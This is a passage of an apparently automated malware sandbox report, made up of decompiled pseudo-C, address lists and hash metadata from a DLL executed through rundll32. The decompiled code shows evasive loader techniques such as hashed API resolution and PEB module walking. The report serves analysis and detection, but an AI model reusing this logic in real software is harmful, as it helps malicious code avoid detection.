						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6ECFF4E0( &(_t535[0xc]), _t62);
						_t455 = E6ECFF4E0( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6ed0146c
0x6ed01473
0x6ed01476
0x6ed0147d
0x6ed01bff
0x6ed01bff
0x6ed01483
0x6ed0148e
0x6ed019cd
0x6ed019d1
0x00000000
0x6ed01c50
0x6ed019d7
0x6ed019da
0x6ed019dd
0x6ed019e7
0x6ed019f6
0x6ed019f8
0x6ed019ff
0x6ed01be9
0x6ed01beb
0x6ed01bee
0x6ed01bf2
0x00000000
0x6ed01bf2
0x6ed01a0e
0x6ed01a19
0x6ed01a20
0x6ed01a23
0x6ed01a25
0x6ed01a28
0x6ed01a2b
0x6ed01a31
0x6ed01a3f
0x6ed01a4f
0x6ed01a74
0x6ed01a85
0x6ed01a88
0x6ed01a8a
0x6ed01aee
0x6ed01af1
0x6ed01af1
0x6ed01af3
0x6ed01af6
0x6ed01afa
0x6ed01afa
0x6ed01afe
0x00000000
0x00000000
0x6ed01b0b
0x6ed01b11
0x6ed01b45
0x6ed01b4b
0x6ed01b4d
0x6ed01c1c
0x6ed01c24
0x6ed01c27
0x6ed01c29
0x6ed01c40
0x6ed01c40
0x6ed01c2b
0x6ed01c2f
0x6ed01c34
0x6ed01c34
0x6ed01c42
0x6ed01c48
0x6ed01b67
0x6ed01b67
0x6ed01b69
0x6ed01b69
0x6ed01b6b
0x6ed01b6b
0x6ed01b70
0x00000000
0x00000000
0x6ed01b72
0x6ed01b73
0x6ed01b76
0x6ed01b79
0x00000000
0x00000000
0x6ed01b85
0x6ed01b88
0x6ed01b8a
0x6ed01ba1
0x6ed01ba1
0x6ed01b8c
0x6ed01b90
0x6ed01b95
0x6ed01b95
0x6ed01bae
0x6ed01bb1
0x6ed01bba
0x6ed01bbd
0x6ed01be0
0x6ed01be4
0x00000000
0x6ed01be4
0x6ed01bc5
0x6ed01bc5
0x6ed01bd1
0x6ed01bd4
0x6ed01bdd
0x00000000
0x6ed01bdd
0x6ed01b53
0x6ed01b63
0x6ed01b63
0x6ed01b65
0x00000000
0x00000000
0x6ed01b5b
0x6ed01b5d
0x6ed01b5d
0x00000000
0x6ed01b63
0x6ed01b13
0x6ed01b1b
0x6ed01b3b
0x6ed01b1d
0x6ed01b1d
0x6ed01b25
0x6ed01b2e
0x6ed01b2e
0x6ed01b25
0x00000000
0x6ed01b1b
0x6ed01a8c
0x6ed01a93
0x00000000
0x00000000
0x6ed01aa0
0x6ed01aa6
0x6ed01aab
0x6ed01ab2
0x6ed01ab6
0x6ed01acb
0x6ed01acd
0x6ed01acf
0x6ed01ad5
0x6ed01ae3
0x6ed01ae3
0x6ed01ae9
0x00000000
0x6ed01ae9
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed01a33
0x6ed01a33
0x6ed01a33
0x6ed01a34
0x6ed01a37
0x6ed01a3b
0x00000000
0x6ed01a51
0x6ed01a54
0x6ed01a57
0x6ed01a60
0x6ed01a63
0x6ed01a64
0x6ed01a66
0x00000000
0x6ed014a1
0x6ed014a3
0x6ed014a8
0x6ed014b3
0x6ed014c1
0x6ed014d4
0x6ed014e1
0x6ed014ea
0x6ed014ee
0x6ed014f2
0x6ed0153a
0x6ed0153a
0x6ed0153c
0x6ed01543
0x00000000
0x00000000
0x6ed0155c
0x6ed01564
0x6ed01568
0x6ed0157d
0x6ed01581
0x6ed01585
0x6ed0158e
0x6ed01594
0x6ed01597
0x6ed0159b
0x6ed015a3
0x6ed015a5
0x6ed015a9
0x6ed015b0
0x6ed015b9
0x6ed015b9
0x6ed015bd
0x6ed015d2
0x6ed015e8
0x6ed015f5
0x6ed015f6
0x6ed015f6
0x6ed015f8
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed015b2
0x6ed015b2
0x6ed015b2
0x6ed015b3
0x6ed015b4
0x00000000
0x6ed015b2
0x6ed01577
0x6ed0157b
0x00000000
0x00000000
0x00000000
0x6ed015fc
0x6ed015fc
0x6ed015fd
0x6ed01600
0x6ed0160a
0x6ed0160a
0x6ed0160e
0x6ed01615
0x6ed01670
0x6ed01675
0x6ed016c8
0x6ed016c8
0x6ed016cc
0x6ed016d0
0x6ed014fa
0x6ed014fd
0x6ed01502
0x6ed01508
0x6ed0150b
0x6ed01512
0x6ed01516
0x6ed0151d
0x6ed01526
0x6ed0152a
0x6ed0152e
0x6ed01534
0x00000000
0x00000000
0x00000000
0x6ed01534
0x6ed016da
0x6ed016e6
0x6ed016f1
0x6ed016f8
0x6ed01701
0x6ed0170b
0x6ed0170c
0x6ed0171a
0x6ed0171f
0x6ed01720
0x6ed0172d
0x6ed01732
0x6ed01744
0x6ed01749
0x6ed0174e
0x6ed01760
0x6ed01772
0x6ed01777
0x6ed01782
0x6ed01789
0x6ed0178e
0x6ed01796
0x6ed0179f
0x6ed0179f
0x6ed017ab
0x6ed017b2
0x6ed017be
0x6ed017ca
0x6ed017d8
0x6ed017e9
0x6ed017f0
0x6ed017f5
0x6ed017fe
0x6ed01803
0x6ed01805
0x6ed01809
0x6ed0180d
0x6ed0181a
0x6ed01827
0x6ed0182b
0x6ed0183f
0x6ed01843
0x00000000
0x00000000
0x6ed01858
0x6ed0185a
0x6ed01862
0x6ed0185f
0x6ed0185f
0x6ed0185f
0x6ed01866
0x6ed01868
0x6ed0186e
0x6ed01874
0x6ed018d0
0x6ed018d9
0x6ed018dd
0x6ed018ea
0x6ed018f3
0x6ed018f8
0x6ed018fc
0x6ed018ff
0x6ed01960
0x6ed01976
0x6ed01981
0x6ed01982
0x6ed01983
0x6ed01987
0x6ed0198a
0x6ed01c0a
0x6ed01c0d
0x6ed01c0d
0x00000000
0x6ed0198a
0x6ed01909
0x6ed01919
0x6ed01922
0x6ed0192b
0x6ed01934
0x6ed01935
0x6ed01936
0x6ed0193b
0x6ed01943
0x6ed0194b
0x00000000
0x00000000
0x00000000
0x6ed0194d
0x6ed0187d
0x6ed01882
0x6ed01886
0x6ed01886
0x6ed0188a
0x6ed0188d
0x00000000
0x00000000
0x6ed018ae
0x6ed018b0
0x6ed018b4
0x6ed018b6
0x00000000
0x00000000
0x6ed018b8
0x6ed018bf
0x6ed018cb
0x00000000
0x6ed018cb
0x6ed01892
0x00000000
0x6ed01990
0x6ed01990
0x6ed01991
0x6ed019a1
0x6ed019ad
0x6ed019b6
0x6ed019bf
0x6ed019c8
0x00000000
0x6ed019c8
0x6ed01677
0x6ed01679
0x6ed0167b
0x6ed01680
0x6ed01685
0x6ed01698
0x6ed016ae
0x6ed016b7
0x6ed016b8
0x6ed016b8
0x6ed016ba
0x6ed016bb
0x6ed016be
0x6ed016c2
0x00000000
0x6ed0167b
0x6ed01617
0x6ed01621
0x6ed01622
0x6ed01622
0x6ed0162f
0x6ed0163b
0x6ed0163d
0x6ed0163f
0x6ed01643
0x6ed01653
0x6ed01653
0x6ed0165a
0x6ed0165d
0x6ed0165e
0x6ed01662
0x6ed0166c
0x00000000
0x6ed0166c

Memory Dump Source

Source File: 00000000.00000002.647984137.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000000.00000002.647878213.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648291272.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648382411.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648422509.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dba8a29d3039e560f04917ba2b0bb981d674053f10f1446dcaac552bfe790810
Instruction ID: 8ee907a8146403878ac80060872830f020c4a9d0297869b93dedc0a044c5c644
Opcode Fuzzy Hash: dba8a29d3039e560f04917ba2b0bb981d674053f10f1446dcaac552bfe790810
Instruction Fuzzy Hash: 83325C70508385CFD754DFA8C890ADEBBE4FF85308F14892DE595872A1EB70E94ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01D58, Relevance: .3, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E6ED01D58(intOrPtr __eax) {
				void* _t72;
				intOrPtr _t74;
				signed int _t75;
				signed int _t76;
				signed char _t84;
				signed char _t86;
				signed char _t89;
				signed char _t92;
				signed char _t95;
				signed char* _t99;
				void* _t113;
				signed char _t114;
				signed char _t116;
				signed char _t118;
				intOrPtr _t119;
				signed char _t120;
				signed char _t127;
				signed char _t129;
				signed char _t130;
				signed char _t143;
				signed char _t145;
				signed char _t146;
				signed int _t147;
				signed char _t148;
				void* _t151;
				signed char _t155;
				signed char _t159;
				signed char _t165;
				signed char _t166;
				signed char _t167;
				signed char _t168;
				void* _t170;
				void* _t171;
				intOrPtr _t172;
				signed char _t173;
				intOrPtr _t174;
				intOrPtr* _t175;
				signed char _t176;
				signed char _t177;
				signed char _t178;
				signed char _t179;
				signed char* _t181;

				_t119 = __eax;
				_t143 =  *0x6ed0d21c; // 0x76470dcb
				if(_t143 == 0x76470dcb) {
					_t143 = 0;
					 *0x6ed0d21c = 0;
				}
				if(_t119 != 0xfe338407) {
					L4:
					_t174 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
					if(_t119 != 0xa7e21d79) {
						while(1) {
							L10:
							__eflags = _t143;
							if(_t143 == 0) {
								break;
							}
							_t72 = 0;
							_t120 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t119 -  *((intOrPtr*)(_t120 + _t143 + 8));
								if(_t119 ==  *((intOrPtr*)(_t120 + _t143 + 8))) {
									break;
								}
								_t72 = _t72 + 1;
								_t120 = _t120 + 0x10;
								__eflags = _t72 - 0x10;
								if(_t72 < 0x10) {
									continue;
								}
								_t143 =  *(_t143 + 0x100);
								goto L10;
							}
							return  *((intOrPtr*)(_t120 + _t143 + 0xc));
						}
						__eflags = _t119 - 0x94e21d79;
						if(_t119 != 0x94e21d79) {
							_t74 =  *((intOrPtr*)(_t174 + 0xc));
							_t175 =  *((intOrPtr*)(_t74 + 0xc));
							_t181[4] =  *(_t74 + 0x10);
							while(1) {
								_t172 =  *((intOrPtr*)(_t175 + 0x30));
								_t75 = 0;
								__eflags = 0;
								while(1) {
									_t145 =  *(_t172 + _t75 * 2) & 0x0000ffff;
									_t181[0x1c + _t75 * 2] = _t145;
									__eflags = _t145;
									_t146 =  *(_t175 + 0x2c) & 0x0000ffff;
									if(_t145 == 0) {
										break;
									}
									_t75 = _t75 + 1;
									__eflags = _t75 - _t146;
									if(_t75 <= _t146) {
										continue;
									}
									break;
								}
								__eflags = _t146;
								_t147 = 0;
								if(_t146 <= 0) {
									L34:
									_t76 = E6ED04FD4( &(_t181[0x13c]), _t147);
									__eflags = _t119 - (_t76 ^ 0x7af3da47);
									if(_t119 == (_t76 ^ 0x7af3da47)) {
										_t173 =  *(_t175 + 0x18);
										__eflags = _t173;
										if(_t173 == 0) {
											L55:
											return _t173;
										}
										L38:
										_t148 =  *0x6ed0d2ec; // 0x0
										__eflags = _t148 |  *0x6ed0d2ed;
										if((_t148 |  *0x6ed0d2ed) == 0) {
											_t176 =  *0x6ed0d21c; // 0x76470dcb
											__eflags = _t176;
											if(_t176 == 0) {
												 *0x6ed0d2ec = 1;
												_t177 = E6ED035F4(0x104);
												__eflags = _t177;
												if(_t177 == 0) {
													_t177 = 0;
													__eflags = 0;
													L62:
													 *0x6ed0d21c = _t177;
													 *0x6ed0d214 = E6ED03044(0xfe338407, 0xb0386671, 0xfe338407, 0xfe338407);
													 *0x6ed0d2ec = 0;
													L45:
													_t151 = 0;
													_t165 = 0;
													__eflags = 0;
													while(1) {
														__eflags =  *(_t165 + _t177 + 8);
														if( *(_t165 + _t177 + 8) == 0) {
															break;
														}
														_t151 = _t151 + 1;
														_t165 = _t165 + 0x10;
														__eflags = _t151 - 0x10;
														if(_t151 < 0x10) {
															continue;
														}
														_t84 = E6ED035F4(0x104);
														_t181[4] = _t84;
														__eflags =  *_t181;
														if( *_t181 == 0) {
															 *_t181 = 0;
															L53:
															 *( *_t181 + 0xc) = _t173;
															E6ECFD03C( *_t181,  &(_t181[0x1c]));
															_t155 =  *_t181;
															 *((intOrPtr*)(_t155 + 8)) = _t119;
															 *(_t177 + 0x100) = _t155;
															goto L55;
														}
														_t167 = _t84;
														_t86 = 0x10;
														do {
															_t181[0x13c] = _t86;
															E6ECFCFC8(_t167, 0);
															 *((intOrPtr*)(_t167 + 8)) = 0;
															 *((intOrPtr*)(_t167 + 0xc)) = 0;
															_t167 = _t167 + 0x10;
															_t86 = _t181[0x138] - 1;
															__eflags = _t86;
														} while (_t86 != 0);
														 *( *_t181 + 0x100) = 0;
														goto L53;
													}
													_t166 = _t165 + _t177;
													__eflags = _t166;
													 *(_t166 + 0xc) = _t173;
													E6ECFD03C(_t166,  &(_t181[0x1c]));
													 *((intOrPtr*)(_t166 + 8)) = _t119;
													goto L55;
												}
												_t168 = _t177;
												_t89 = 0x10;
												do {
													_t181[4] = _t89;
													E6ECFCFC8(_t168, 0);
													 *((intOrPtr*)(_t168 + 8)) = 0;
													 *((intOrPtr*)(_t168 + 0xc)) = 0;
													_t168 = _t168 + 0x10;
													_t89 =  *_t181 - 1;
													__eflags = _t89;
												} while (_t89 != 0);
												 *(_t177 + 0x100) = 0;
												goto L62;
											}
											_t159 =  *(_t176 + 0x100);
											while(1) {
												__eflags = _t159;
												if(_t159 == 0) {
													goto L45;
												}
												_t177 = _t159;
												_t159 =  *(_t159 + 0x100);
											}
											goto L45;
										}
										__eflags = _t119 - 0xfe338407;
										if(_t119 == 0xfe338407) {
											 *0x6ed0d220 = _t173;
										}
										goto L55;
									}
									__eflags = _t175 - _t181[4];
									if(_t175 != _t181[4]) {
										_t175 =  *_t175;
										continue;
									}
									L36:
									_t173 = 0;
									goto L55;
								}
								_t92 = 0;
								__eflags = 0;
								while(1) {
									_t126 =  *((char*)(_t172 + _t147 * 2));
									 *_t181 = _t92;
									_t39 = _t126 - 0x41; // -81
									__eflags = _t39 - 0x19;
									_t40 = _t126 + 0x20; // 0x10
									_t127 =  <=  ? _t40 :  *((char*)(_t172 + _t147 * 2));
									_t181[_t147 + 0x13c] = _t127;
									_t95 =  *_t181;
									__eflags = _t127;
									if(_t127 == 0) {
										goto L34;
									}
									_t92 = _t95 + 1;
									_t147 = _t147 + 1;
									__eflags = _t92 - ( *(_t175 + 0x2c) & 0x0000ffff);
									if(_t92 < ( *(_t175 + 0x2c) & 0x0000ffff)) {
										continue;
									}
									goto L34;
								}
								goto L34;
							}
						}
						_t170 = E6ED09A00();
						_t178 = 0;
						while(1) {
							_t129 = E6ED03044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t129;
							if(_t129 == 0) {
								goto L16;
							}
							_t116 =  *_t129(0xffffffff, _t178, 0,  &(_t181[0x11c]), 0x1c, 0);
							__eflags = _t116;
							if(_t116 != 0) {
								goto L36;
							}
							L16:
							_t99 =  &(_t181[0x120]);
							_t173 =  *_t99;
							_t130 = _t99[8];
							__eflags = _t173 - _t170;
							if(_t173 > _t170) {
								L13:
								_t178 = _t178 + _t130;
								__eflags = _t178;
								continue;
							}
							__eflags = _t130 + _t173 - _t170;
							if(_t130 + _t173 <= _t170) {
								goto L13;
							}
							__eflags = _t173;
							if(_t173 == 0) {
								goto L55;
							}
							E6ECFF5A8( &(_t181[0x10]), 0x400);
							_t171 = E6ECFF4E0( &(_t181[0x10]), 0);
							_t179 = E6ED03044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t179;
							if(_t179 == 0) {
								L21:
								E6ECFD000( &(_t181[0xc]),  *((intOrPtr*)(_t171 + 4)), 0);
								__eflags = E6ECFD210( &(_t181[8]), 0x5c);
								if(__eflags != 0) {
									_push(0x5c);
									E6ECFD650( &(_t181[0xc]), __eflags,  &(_t181[0x1bc]));
									E6ECFD03C( &(_t181[8]), _t181[0x1bc]);
									E6ECFD020( &(_t181[0x1bc]));
								}
								E6ECFDE70( &(_t181[0x20]), _t181[4], 0);
								E6ECFD020( &(_t181[4]));
								L24:
								E6ECFF678( &(_t181[0xc]));
								goto L38;
							}
							 *_t181 = E6ECFF4E0( &(_t181[0x10]), 0);
							_t113 = E6ECFF4F0( &(_t181[0xc]));
							_t114 =  *_t179(0xffffffff, _t173, 2, _t181[8], _t113, 0);
							__eflags = _t114;
							if(_t114 != 0) {
								goto L24;
							}
							goto L21;
						}
					}
					return  *((intOrPtr*)(_t174 + 8));
				} else {
					_t118 =  *0x6ed0d220; // 0xe86b6198
					if(_t118 != 0xe86b6198) {
						return _t118;
					}
					goto L4;
				}
			}

0x6ed01d62
0x6ed01d64
0x6ed01d70
0x6ed01d72
0x6ed01d74
0x6ed01d74
0x6ed01d80
0x6ed01d92
0x6ed01d98
0x6ed01da1
0x6ed01dc8
0x6ed01dc8
0x6ed01dc8
0x6ed01dca
0x00000000
0x00000000
0x6ed01dab
0x6ed01dad
0x6ed01dad
0x6ed01daf
0x6ed01daf
0x6ed01db3
0x00000000
0x00000000
0x6ed01db9
0x6ed01dba
0x6ed01dbd
0x6ed01dc0
0x00000000
0x00000000
0x6ed01dc2
0x00000000
0x6ed01dc2
0x00000000
0x6ed020f1
0x6ed01dcc
0x6ed01dd2
0x6ed01efe
0x6ed01f04
0x6ed01f07
0x6ed01f10
0x6ed01f10
0x6ed01f13
0x6ed01f13
0x6ed01f15
0x6ed01f15
0x6ed01f19
0x6ed01f1e
0x6ed01f20
0x6ed01f24
0x00000000
0x00000000
0x6ed01f26
0x6ed01f27
0x6ed01f29
0x00000000
0x00000000
0x00000000
0x6ed01f29
0x6ed01f2b
0x6ed01f2f
0x6ed01f30
0x6ed01f62
0x6ed01f69
0x6ed01f73
0x6ed01f75
0x6ed01f84
0x6ed01f87
0x6ed01f89
0x6ed02071
0x00000000
0x6ed02071
0x6ed01f8f
0x6ed01f8f
0x6ed01f95
0x6ed01f9b
0x6ed01fb4
0x6ed01fba
0x6ed01fbc
0x6ed02085
0x6ed02091
0x6ed02094
0x6ed02096
0x6ed020c7
0x6ed020c7
0x6ed020c9
0x6ed020d5
0x6ed020e0
0x6ed020e5
0x6ed01fd6
0x6ed01fd6
0x6ed01fd8
0x6ed01fd8
0x6ed01fda
0x6ed01fda
0x6ed01fdf
0x00000000
0x00000000
0x6ed01fe1
0x6ed01fe2
0x6ed01fe5
0x6ed01fe8
0x00000000
0x00000000
0x6ed01fef
0x6ed01ff4
0x6ed01ff9
0x6ed01ffd
0x6ed02038
0x6ed0203f
0x6ed02047
0x6ed0204a
0x6ed0204f
0x6ed02052
0x6ed02055
0x00000000
0x6ed02055
0x6ed01fff
0x6ed02003
0x6ed02004
0x6ed02008
0x6ed0200f
0x6ed0201d
0x6ed02020
0x6ed02023
0x6ed02026
0x6ed02026
0x6ed02026
0x6ed0202c
0x00000000
0x6ed0202c
0x6ed0205d
0x6ed0205d
0x6ed02066
0x6ed02069
0x6ed0206e
0x00000000
0x6ed0206e
0x6ed02098
0x6ed0209c
0x6ed0209d
0x6ed020a1
0x6ed020a5
0x6ed020af
0x6ed020b2
0x6ed020b5
0x6ed020b8
0x6ed020b8
0x6ed020b8
0x6ed020bb
0x00000000
0x6ed020bb
0x6ed01fc2
0x6ed01fd2
0x6ed01fd2
0x6ed01fd4
0x00000000
0x00000000
0x6ed01fca
0x6ed01fcc
0x6ed01fcc
0x00000000
0x6ed01fd2
0x6ed01f9d
0x6ed01fa3
0x6ed01fa9
0x6ed01fa9
0x00000000
0x6ed01fa3
0x6ed01f77
0x6ed01f7b
0x6ed01f0d
0x00000000
0x6ed01f0d
0x6ed01f7d
0x6ed01f7d
0x00000000
0x6ed01f7d
0x6ed01f32
0x6ed01f32
0x6ed01f34
0x6ed01f34
0x6ed01f38
0x6ed01f3b
0x6ed01f3e
0x6ed01f41
0x6ed01f47
0x6ed01f4a
0x6ed01f51
0x6ed01f54
0x6ed01f56
0x00000000
0x00000000
0x6ed01f58
0x6ed01f59
0x6ed01f5e
0x6ed01f60
0x00000000
0x00000000
0x00000000
0x6ed01f60
0x00000000
0x6ed01f34
0x6ed01f10
0x6ed01ddd
0x6ed01ddf
0x6ed01de5
0x6ed01df6
0x6ed01df8
0x6ed01dfa
0x00000000
0x00000000
0x6ed01e0d
0x6ed01e0f
0x6ed01e11
0x00000000
0x00000000
0x6ed01e17
0x6ed01e17
0x6ed01e1e
0x6ed01e20
0x6ed01e23
0x6ed01e25
0x6ed01de3
0x6ed01de3
0x6ed01de3
0x00000000
0x6ed01de3
0x6ed01e2a
0x6ed01e2c
0x00000000
0x00000000
0x6ed01e2e
0x6ed01e30
0x00000000
0x00000000
0x6ed01e3f
0x6ed01e4f
0x6ed01e62
0x6ed01e64
0x6ed01e66
0x6ed01e91
0x6ed01e9a
0x6ed01eaa
0x6ed01eac
0x6ed01eb5
0x6ed01ebc
0x6ed01ecc
0x6ed01ed3
0x6ed01ed3
0x6ed01ee2
0x6ed01eeb
0x6ed01ef0
0x6ed01ef4
0x00000000
0x6ed01ef4
0x6ed01e73
0x6ed01e7a
0x6ed01e8b
0x6ed01e8d
0x6ed01e8f
0x00000000
0x00000000
0x00000000
0x6ed01e8f
0x6ed01de5
0x00000000
0x6ed01d82
0x6ed01d82
0x6ed01d8c
0x6ed0207d
0x6ed0207d
0x00000000
0x6ed01d8c

Memory Dump Source

Source File: 00000000.00000002.647984137.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000000.00000002.647878213.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648291272.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648382411.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648422509.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d605762c3fdf5beadc8d5f5379e43e01904d9abd44b7dc19d28b174087f118c0
Instruction ID: 50f1f217440c4cc0c2596c25a3b8533f61d15d6e4d553e8e1d42e8901a9f3a60
Opcode Fuzzy Hash: d605762c3fdf5beadc8d5f5379e43e01904d9abd44b7dc19d28b174087f118c0
Instruction Fuzzy Hash: 9BA11531608345DFE754DFA9C890BAEB7A5FF80308F28C92DE49487291EB31D946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6ECF6D50, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECF6D50() {

				 *0x6ed0d280 = GetUserNameW;
				 *0x6ED0D284 = MessageBoxW;
				 *0x6ED0D288 = GetLastError;
				 *0x6ED0D28C = CreateFileA;
				 *0x6ED0D290 = DebugBreak;
				 *0x6ED0D294 = FlushFileBuffers;
				 *0x6ED0D298 = FreeEnvironmentStringsA;
				 *0x6ED0D29C = GetConsoleOutputCP;
				 *0x6ED0D2A0 = GetEnvironmentStrings;
				 *0x6ED0D2A4 = GetLocaleInfoA;
				 *0x6ED0D2A8 = GetStartupInfoA;
				 *0x6ED0D2AC = GetStringTypeA;
				 *0x6ED0D2B0 = HeapValidate;
				 *0x6ED0D2B4 = IsBadReadPtr;
				 *0x6ED0D2B8 = LCMapStringA;
				 *0x6ED0D2BC = LoadLibraryA;
				 *0x6ED0D2C0 = OutputDebugStringA;
				return 0x6ed0d280;
			}

0x6ecf6d61
0x6ecf6d69
0x6ecf6d6c
0x6ecf6d7b
0x6ecf6d7e
0x6ecf6d8d
0x6ecf6d90
0x6ecf6d9f
0x6ecf6da2
0x6ecf6db1
0x6ecf6db4
0x6ecf6dc3
0x6ecf6dc6
0x6ecf6dd5
0x6ecf6dd8
0x6ecf6de7
0x6ecf6dea
0x6ecf6ded

Memory Dump Source

Source File: 00000000.00000002.647984137.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000000.00000002.647878213.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648291272.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648382411.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648422509.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46118ac333f2bc2a14c0f8f6e376fe5fefc385e33560fbe3c1378170b2e44cc2
Instruction ID: c58071eb16ac44dd93dbf5915fae1a6a5e3348f1b4dc8dd2895889e04392a761
Opcode Fuzzy Hash: 46118ac333f2bc2a14c0f8f6e376fe5fefc385e33560fbe3c1378170b2e44cc2
Instruction Fuzzy Hash: A411E0B8A15A18CFAB58CF09D190D517BF1FB8E31131AC2AED8098B369D734DA46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 6ECFC218, Relevance: 5.1, Strings: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6ECFC218(void* __ecx, void* __edx) {
				char _v28;
				char _v33;
				char _v38;
				char _v43;
				void* _t24;
				char* _t25;
				char _t32;
				void* _t33;
				void* _t34;
				signed int _t38;
				char* _t40;

				_t40 = (_t38 & 0xfffffff0) - 0x2c;
				asm("movq xmm0, [edx]");
				_t32 = 0;
				 *_t40 = 0x7b;
				asm("movq [esp+0x1], xmm0");
				_v43 = 0x2d;
				do {
					 *((char*)(_t40 + _t32 + 0xa)) =  *((intOrPtr*)(_t32 + __edx + 8));
					_t32 = _t32 + 1;
				} while (_t32 < 4);
				_v38 = 0x2d;
				_t33 = 0;
				do {
					 *((char*)(_t40 + _t33 + 0xf)) =  *((intOrPtr*)(_t33 + __edx + 0xc));
					_t33 = _t33 + 1;
				} while (_t33 < 4);
				_v33 = 0x2d;
				_t34 = 0;
				do {
					 *((char*)(_t40 + _t34 + 0x14)) =  *((intOrPtr*)(_t34 + __edx + 0x10));
					_t34 = _t34 + 1;
				} while (_t34 < 4);
				_v28 = 0x2d;
				_t24 = 0;
				do {
					asm("movd xmm0, dword [eax+edx+0x14]");
					asm("movd [esp+eax+0x19], xmm0");
					_t24 = _t24 + 4;
				} while (_t24 < 0xc);
				_t25 = _t40;
				 *((char*)(_t25 + 0x25)) = 0x7d;
				 *((char*)(_t25 + 0x26)) = 0;
				E6ECFDFBC(__ecx, _t25, 0);
				return __ecx;
			}

0x6ecfc21f
0x6ecfc224
0x6ecfc228
0x6ecfc22a
0x6ecfc22e
0x6ecfc234
0x6ecfc239
0x6ecfc23d
0x6ecfc241
0x6ecfc242
0x6ecfc249
0x6ecfc24e
0x6ecfc250
0x6ecfc254
0x6ecfc258
0x6ecfc259
0x6ecfc260
0x6ecfc265
0x6ecfc267
0x6ecfc26b
0x6ecfc26f
0x6ecfc270
0x6ecfc275
0x6ecfc27a
0x6ecfc27c
0x6ecfc27c
0x6ecfc282
0x6ecfc288
0x6ecfc28b
0x6ecfc292
0x6ecfc295
0x6ecfc29b
0x6ecfc2a0
0x6ecfc2ae

Strings

-, xrefs: 6ECFC260
-, xrefs: 6ECFC234
-, xrefs: 6ECFC275
-, xrefs: 6ECFC249

Memory Dump Source

Source File: 00000000.00000002.647984137.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000000.00000002.647878213.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648291272.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648382411.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648422509.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: -$-$-$-
API String ID: 0-1033403326
Opcode ID: 1d36367edc1a87d387ea343f4f2a29612f5303ddecac01934eed59726700fcc9
Instruction ID: 28411685eca6fc86e569132def743537cd9891e84f13d205e1306a2030dcd640
Opcode Fuzzy Hash: 1d36367edc1a87d387ea343f4f2a29612f5303ddecac01934eed59726700fcc9
Instruction Fuzzy Hash: 67114C2061C3C18CE3499BBC548072BFFD48F9A208F188ABED4DAC6B53E525D4568377

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5596 Parent PID: 1624 rundll32.exeCOMMON

Executed Functions

Function 00FC2062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00FC2062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
